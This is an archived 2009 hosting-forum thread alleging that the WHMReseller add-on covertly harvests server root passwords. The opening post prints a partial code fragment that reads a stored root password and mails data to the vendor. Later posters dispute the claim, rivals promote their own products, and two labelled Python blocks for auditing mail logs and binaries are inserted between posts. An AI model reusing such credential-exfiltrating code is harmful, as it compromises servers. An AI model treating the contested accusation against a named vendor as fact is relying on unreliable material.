WHMReseller users, Your Server's ROOT Password is not SAFE!

Discussion in 'Site & Server Administration' started by coolstuff0000, Mar 16, 2009.

  1. #1
    Hiya

    First of all, what I am going to disclose here is not a fake statement.

    One of my chat friends told me that he was able to decode the WHMReseller software owned by deasoft.com, which is used for creating master resellers.

    I don't know how he got it, and at first I thought it was just a fake comment. Then I asked for proof and he gave me proof, surprising me!

    After chatting with him and discussing this for a long time, we found that the servers running WHMReseller are not safe.

    WHMReseller will decode the server root password and send that password to which is operated by Brett Deason.


    And when I asked for proof, he gave me this sample code from the whmreseller script:

    Filename: versionupdate

    
    
    save_debug();
    //Get server root password
    sprintf(datafile, "%ssrdatafile.txt", PRIDIR);
    get_data(datafile, 'f', 0);
    decode(datafile);
    gnf("serverrootpass=", " ", datafile, serverrootpass, 2);
    randomise_decode(serverrootpass);
    decode(serverrootpass);

        //If not found then create one now
        sprintf(temp3, "%ssrmarker", PRIDIR);
        strcpy(temp4, "WHMreseller debug marker file\nPlease do not remove\n");
        put_data(temp3, temp4);
        //Get actual instances
        sprintf(temp5, "echo ps -aux | grep curl");
        get_data(temp5, 'p', 0);
        //Email deasoft with ps -aux output
        gnf("sendmail=", " ", datafile, sendmail, 2);
        sprintf(temp3, "%s sales@deasoft.com", sendmail);
        pi=popen(temp3, "w");
        fprintf(pi, "Subject: %s\n", "WHMreseller Bug Detected");
        fprintf(pi, "From: none\n");
        fprintf(pi, "Reply-To: none\n");
        fprintf(pi, "\n");
        sprintf(temp3, "ps -aux Output:\n\n%s\n\nMore Detail:\n", temp2);
        fputs(temp3, pi);
        fputs(temp5, pi);
        pclose(pi);
        stop=1;
    }
    
    
    Code (markup):


    It's a bit of the C++ code, and not the full file.

    So just to let you know, EVERY SERVER'S root password is with DEASOFT BRETT DEASON, and if he thinks to, he can root all the servers!
     
    coolstuff0000, Mar 16, 2009 IP
  2. K4NK4

    K4NK4 Guest

    #2
    stop spreading exploits idiot !
     
    K4NK4, Mar 16, 2009 IP
  3. funning17

    funning17 Member

    #3
    deasoft is the worst software ever made for master resellers, and now a new bottom line has been added for security lol!!
     
    funning17, Mar 16, 2009 IP
  4. HJITechnologiesLLC

    HJITechnologiesLLC Well-Known Member

    #4
    ... And that is why I don't use/Sell Master Resellers.
     
    HJITechnologiesLLC, Mar 16, 2009 IP
  5. njoker555

    njoker555 Notable Member

    #5
    master reseller software is unreliable to begin with, you can't just put the blame on one server - and most master resellers only stay in business for a little while before they make their short term profit then bounce - ugly..
     
    njoker555, Mar 16, 2009 IP
  6. moneydude

    moneydude Well-Known Member

    #6
    Can somebody else confirm this ?
     
    moneydude, Mar 16, 2009 IP
  7. rewer

    rewer Peon

    #7
    Normally I would not believe something without more proof but knowing the type of company Deasoft is I can only wish the best of luck to everyone running their software. A very great reliable master reseller software I have used is Zamfoo. From when I first installed it on my server I noticed a great decrease in server cpu that was being used up but what simply blew me away was the toolset they offer. I do not know how much longer Whmreseller will continue to run but if you guys are looking for a good, safe, and secure master reseller software I would recommend Zamfoo.
     
    rewer, Mar 16, 2009 IP
  8. ChrisMiller

    ChrisMiller Prominent Member

    #8
    I second that!
    I have been offering Master Resellers since May 2008 and have always felt like Deasoft's software was worthless junk from the start.
    Around 2 weeks ago I switched to Zamfoo and I don't regret it at all.
    Zamfoo's support team has been good to me, always willing to help, and the switch went over easier than I expected.

    -Chris
     
    ChrisMiller, Mar 16, 2009 IP
  9. Kaoz

    Kaoz Peon

    #9
    Hmm, I might switch, as my WHMReseller is VERY BUGGY, it has been for 2 of my servers and it destroyed reseller/master reseller rights for my NL server and I had to add everyone manually again.
     
    Kaoz, Mar 16, 2009 IP
  10. qualityhostings

    qualityhostings Well-Known Member

    #10

    There were already some security issues with whmreseller. But actually I didn't think that brett would send the server root password to his email id.



    Well, I cannot support you. There are a lot of hosts, including me, who have been selling master reseller for years. In my case, I have been selling it for 2 years.
    I also used WHMReseller, because there was no alternative.

    But as I said before, I didn't know that we are just jokers and whmreseller is sending our root passwords to brett deason.

    Thank God I made my own master reseller software called WHMResellerPHP (www.whmphp.com) and switched to whmphp from whmreseller.



    Definitely, we have had a lot of issues like deletion of master rights, and even reseller rights, from our servers because of whmreseller. That's why I switched to whmphp.


    Regards
     
    qualityhostings, Mar 16, 2009 IP
  11. hostydotnet

    hostydotnet Active Member

    #11
    hi,

    it's nice to hear the love coming back. as a direct competitor i guess i lose by saying this but maybe my intelligence will compel people to switch software vendors based on the intelligence level of the designers behind the scenes.

    .......however/whatever/whoever....... what i am about to say is actually what i perceive, until otherwise shown conclusive proof that someone has superman like computer powers, to be the truth, the whole truth so help me god.
    -----------------------
    in converting people to my software, i have seen an awful lot of nasty unrecoverable data loss on deasoft's client's machines (sorry about the double possessive). i mean completely wiped out scrambled up garbage with absolutely no way to recover it whatsoever.....complete tragedy. this is most likely a sham started by someone that is very very very very angry.

    here are the reasons why:
    point 1:
    client confidence. what does he gain unless he intentionally wants to screw people on his exit from the master reseller software market. stuff would show up in a virus scan. you could screen your mail logs. which in turn asks the question....why email the password. that is way too obvious. what if you saw your password going through your mail system.....why not drop it to a file and ftp it? laziness.....no. he already has ftp code. it's copy and paste to do that. you can check your mail stats.....

    point 2:
    it is compiled code. you can't reverse that. the only thing you can do is chop it down to byte assembly and reconstruct it. who here has extremely intricate knowledge of assembly.....? anyone....anyone? who the hell has the time to do that....? it would take forever. not only that it is probably all garbage spaghetti code which is why it doesn't work right....never did work right ....and never will work right. why would you want to disassemble compiled garbage that is worthless....to fix it? why not just make it all over again. it has been much easier for me than trying to do "the impossible".

    point 3:
    whm stores the password as a hash. you would have to have a rainbow table or have intricate knowledge on how to reverse a password. again that would require accessing a section of the OS that would be scanned by a virus scanner. this comes directly from cpanel conversations when trying to make the login to whm function. any matching is done forwardly by comparing hashes....not reversing a password and checking it.

    point 4:
    where is the nulled version? it would be all over the internet like wild fire. it is nowhere to be found. why only a section of the code released? with all of the pent up anger and aggression why not swing the axe at the neck?
    release the thing if you have it. even i want to see how much ragu parmesan and meatballs are in that code.....

    point 5:
    i see calls to functions that the code is not shown. this would be the heart of where the password decryption takes place....again which can't happen without a monster ....i take that back, an impossible sized rainbow table to crack. if you are going to release code that proves something.....do it. don't show function calls to stuff that is the heart of your point and not provide the whole point you are trying to make.

    point 6:
    he is an idiot. do you think he could possibly figure out how to decode a hashed password? i'd bet a year's salary that says he can't.

    point 7:
    that data file he is supposedly shown pulling the root password out of is whmreseller data file...not a hash storing location or a whm/cpanel file. maybe it's deasoft's root password...or maybe the whole thing is just plain made up and that is the only data file that is plausible for storing a root password in...in this story.... because you can't read it and it has the word data in it.

    ok...so i made the previous 7 points on a whim after thinking about it for approximately 5 minutes while i drank a beer and wrote some code......BUT......i challenge anyone to proooooove beyond a reasonable doubt that what he is claiming here is the truth.

    as a side note, i'm a gambler. does anyone care to bet on it???

    again thanks for the props on my script.

    thanks,
    kevin
     
    hostydotnet, Mar 16, 2009 IP
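
The mail-log screening suggested in point 1 above, as an added example that is not part of the thread and not code from any vendor discussed. It assumes Exim `mainlog`-style lines with the `+subject` log selector enabled; the function name, host names and log lines are constructed, while the watched address and subject are taken from the snippet in post #1.

```python
import re
from collections import defaultdict

# Constructed sample in Exim mainlog style; not real log data. The T="..." subject
# field is only logged when Exim's log_selector includes +subject (assumption).
SAMPLE_LOG = """\
2009-03-16 04:12:07 1LjXyZ-0003Ab-Qr <= root@host1.example.com U=root P=local S=2417 T="WHMreseller Bug Detected"
2009-03-16 04:12:09 1LjXyZ-0003Ab-Qr => sales@deasoft.com R=lookuphost T=remote_smtp H=mx.example.net [192.0.2.10]
2009-03-16 04:12:09 1LjXyZ-0003Ab-Qr Completed
2009-03-16 05:00:01 1LjYaB-0004Cd-Ef <= bob@customer.example U=bob P=local S=901 T="Invoice"
2009-03-16 05:00:03 1LjYaB-0004Cd-Ef => alice@client.example R=lookuphost T=remote_smtp H=mx.client.example [198.51.100.7]
2009-03-16 05:00:03 1LjYaB-0004Cd-Ef Completed
2009-03-16 06:30:00 1LjZcD-0005Gh-Ij <= root@host1.example.com U=root P=local S=512 T="Cron <root@host1> backup"
2009-03-16 06:30:02 1LjZcD-0005Gh-Ij => admin <admin@host1.example.com> R=localuser T=local_delivery
"""

# timestamp, message id, direction (<= arrival, => or -> delivery), address, rest
LINE = re.compile(r"^(\S+ \S+) ([\w-]+) (<=|=>|->) (\S+)(.*)$")

def root_mail_leaving_server(log_text, local_domains, watch=()):
    """Return locally submitted root mail delivered to non-local or watched addresses."""
    local_domains = {d.lower() for d in local_domains}
    watch = {a.lower() for a in watch}
    msgs = defaultdict(lambda: {"time": None, "user": None, "local": False,
                                "subject": None, "rcpts": []})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # "Completed", queue-runner and error lines
        ts, msgid, direction, addr, rest = m.groups()
        rec = msgs[msgid]
        if direction == "<=":
            user = re.search(r"\bU=(\S+)", rest)
            subj = re.search(r'\bT="((?:[^"\\]|\\.)*)"', rest)  # subject, arrival lines only
            rec.update(time=ts, user=user.group(1) if user else None,
                       local="P=local" in rest.split(),
                       subject=subj.group(1) if subj else None)
        else:
            # Deliveries may be logged as "=> name <addr@domain>"
            angle = re.match(r" <([^>]+)>", rest)
            rec["rcpts"].append((angle.group(1) if angle else addr).lower())
    findings = []
    for msgid, rec in msgs.items():
        # Addresses without "@" (pipes, files) are treated as local
        external = [r for r in rec["rcpts"]
                    if "@" in r and r.rpartition("@")[2] not in local_domains]
        watched = [r for r in rec["rcpts"] if r in watch]
        if watched or (rec["user"] == "root" and rec["local"] and external):
            findings.append({"id": msgid, "time": rec["time"], "subject": rec["subject"],
                             "external": external, "watched": watched})
    return findings
```

Run it over the real log with the server's own domains in `local_domains`; an empty result only covers the period the log retains.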
  12. Asus-Games

    Asus-Games Peon

    #12
    Man you people will believe just about anything. I just scanned a whole server for anything that could send an email, his script never came up, it's a fake story. Plus use some logic people:

    1. If he sent every root password to his email he would have almost 23,000,000 emails to date according to their site.

    2. The lies you hear about WHMReseller being horrible are false, I have NEVER EVER had a problem with it and I run it on 12 servers at this very moment and manage 6 servers additionally with it on there.

    3. They may have slow support, but I swear installing their addon couldn't get much easier. It's done in less than 2 minutes on a good server.

    You gotta love people trying to make a dent in the world and make money, but come on there are much better ways to do it. Example: If you think your addon is that great prove it, offer to give it away for 3 months. At that rate, people would be running to try it, after the three months if it's as good as you claim, then people are going to pay for it.

    I'll bet with hostydotnet on this one. He's right and I'm right...
     
    Asus-Games, Mar 16, 2009 IP
  13. qualityhostings

    qualityhostings Well-Known Member

    #13
    Lolz, I would also love to get answers to the above questions from the poster.

    Let me see how he is trying to prove it
     
    qualityhostings, Mar 16, 2009 IP
  14. hostydotnet

    hostydotnet Active Member

    #14
    hi,

    go buy a lottery ticket. you win. you are probably the only person without a SINGLE complaint.

    kevin
     
    hostydotnet, Mar 16, 2009 IP
  15. Asus-Games

    Asus-Games Peon

    #15
    Probably, but it's bound to happen eventually. I just don't see any REAL reason to change yet...
     
    Asus-Games, Mar 16, 2009 IP
  16. hostydotnet

    hostydotnet Active Member

    #16
    hi,

    awesome. good luck with it. i hope everything continues to work for you. one quick question though. which website is yours. i don't see you selling master reseller accounts on any of your sig links?

    nevermind i see it now.

    kevin
     
    hostydotnet, Mar 16, 2009 IP
  17. coolstuff0000

    coolstuff0000 Peon

    #17
    hostydotnet, you asshole, mind your own business?

    I already said that it's not a fake statement.

    The person who gave me this code, who is behind the scenes, is not just a fool. Me neither.

    I am publishing it after verifying 100% that the codes he gave me

    I don't know if it is not possible to decode the executable file, but then I think that Brett's PC was hacked, or his website. (His site now clearly gives me this point; see their site, they don't have a single page alive other than the home page.)


    moneydude, I confirmed this.

    hostydotnet and qualityhostings, you are both owners of similar software, so mind your own business?
    I am not talking about your software, so it's better you both keep mum.


    Asus-Games ; stay with whmreseller and you will see how clients leave you because of the bugs in whmreseller.

    And yes, its source code is out now.

    hostynet , I don't think it is hard to release a nulled version of whmreseller, but you fool, it is going to affect you only.

    Attaching the screenshots as well as the sample code I received from him as proof

     
    coolstuff0000, Mar 16, 2009 IP
  18. hostydotnet

    hostydotnet Active Member

    #18
    hi,

    i am minding my business. this is my business. i want to see it too. i'm not worried about that code. it's not detrimental to me. i could care less if it is out there. i'm not calling you a liar. i'm asking you to prove your statements. it's that simple.

    as a side note. i know approximately....not exactly of course...approximately 34 times more about how the software works than you. i see images of files that you can't tell what is in them. i see incomplete code snippets with comments about deasoft that only show the most common possible file inclusions that can be done.....in notepad as you so clearly show.

    i'm not calling you a liar. i'm not saying that the source hasn't been hacked off of his local machine. i said you can't null it....which is true. it's impossible. i am also telling you 100% for a fact that he is not obtaining any server root passwords without going un-noticed or putting forth a tremendous effort. let me pose a scenario. he logs into ssh and you get an email saying he logged in...then what. how many times will that work before people start noticing it's him?

    just put your money where your mouth is and produce it. produce the raw code.....it's that easy. or produce the person with the raw code.

    if it's out there....then where. provide a link...something....anything. anything other than meaningless screen shots that can't be stuffed through a cpu. we are all waiting. anxiously. waiting.

    thanks,
    kevin
     
    hostydotnet, Mar 17, 2009 IP
  19. qualityhostings

    qualityhostings Well-Known Member

    #19
    hosty and coolstuff,
    I believe you both have some points. As far as I know, C++ executable files cannot be decoded. So the only chance is that the source code was hacked off deasoft's server. And I believe brett is just a fool if he uploaded all the source code without any password protection. So hosty, you're correct here.

    If the first post's code is correct, then I assume WHMReseller is sending the root password to brett only if WHMReseller encounters a bug when versionupdate executes.

    What I believe is, Brett receives the passwords of every server, because there are a lot of bugs in whmreseller, and if it is sending mails when it sees a bug, then brett will probably receive a thousand emails.

    As far as I know, he is the only one there to take care of the hosting service as well as the software. And as everyone knows, he doesn't have time even for fixing the bugs in whmreseller and giving support for whmreseller.

    That could be why he didn't check every server, even though he receives the bug report.

    But it is absolutely wrong to send the server root password without the server owner's permission. But the real fact is that we cannot see the code of the executable file, whether it is sending the root password or not.

    So the final comment will be Brett's own; he needs to check this code and comment here about its ownership. But I am 100% sure he is not going to agree to this, because it is absolutely illegal and he and his company, which is registered with the AU government (I assume), can be sued because of this.

    So the best way is to avoid using such C++ software, which can read files directly from the server's file system and send mails to the creator.



    I respect the work Brett has done (the good work). Although we make similar products and are competing, I request coolstuff not to post any code that you may know or paste screenshots of whmreseller code, even though some people like hostydotnet are very much interested to see it and are compelling you to do so.


    Thank you
     
    qualityhostings, Mar 17, 2009 IP
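
One way a server owner can check which string literals an installed compiled add-on carries, without its source, shown as an added example that is not part of the thread and not the vendor's code. The indicator categories, function names and the sample bytes are this example's own; the sample is constructed from literals in the snippet in post #1 and is not data from the real product.

```python
import re

# Indicator categories are this example's own choice, drawn from the posted snippet.
INDICATORS = {
    "credential_key": re.compile(rb"(root)?pass(word)?=", re.I),
    "email_address": re.compile(rb"[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "mail_header": re.compile(rb"^(Subject|From|Reply-To|To): ", re.I),
    "mailer_or_shell": re.compile(rb"sendmail|/bin/sh|ps -aux|curl"),
}

# Constructed bytes standing in for a compiled binary: an ELF-like header, some
# non-text bytes, and NUL-terminated literals copied from the snippet in post #1.
# This is NOT data from the real product.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(16)) +
    b"%ssrdatafile.txt\x00serverrootpass=\x00sendmail=\x00"
    b"%s sales@deasoft.com\x00Subject: %s\n\x00WHMreseller Bug Detected\x00"
    b"\x90\x90\xc3\x00usage: %s [options]\x00"
)

def printable_strings(blob, min_len=6):
    """Yield (offset, bytes) for runs of printable ASCII, as strings(1) does."""
    for m in re.finditer(rb"[\x20-\x7e\t\n]{%d,}" % min_len, blob):
        yield m.start(), m.group()

def audit_binary(blob, min_len=6):
    """Return (offset, text, tags) for each embedded string matching an indicator."""
    findings = []
    for offset, raw in printable_strings(blob, min_len):
        tags = sorted(name for name, rx in INDICATORS.items() if rx.search(raw))
        if tags:
            findings.append((offset, raw.decode("ascii").strip(), tags))
    return findings

if __name__ == "__main__":
    for offset, text, tags in audit_binary(SAMPLE_BINARY):
        print(f"0x{offset:04x}  {','.join(tags):16}  {text!r}")
```

To audit a real file, pass `open(path, "rb").read()` to `audit_binary`; a hit shows a literal is present in the file, not that the code path using it ever runs, and packed or encoded binaries can hide literals from this kind of scan.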
  20. ImTheHostingMaster

    ImTheHostingMaster Peon

    #20
    I third that! :D

    We switched to Zamfoo weeks ago and it has good features. It does not use a lot of memory or cpu. Their support is extremely fast and awesome, they seriously pwn support. Zamfoo loads much faster than deasoft and zamfoo comes with b9 tool set, which is a tool that installs programs which you can select:
    [​IMG]

    There is also the magic wand tool where you can fix stuff magically:
    [​IMG]

    Zamfoo has definitely won the master reseller software game and I would rate them 100/100!
     
    ImTheHostingMaster, Mar 17, 2009 IP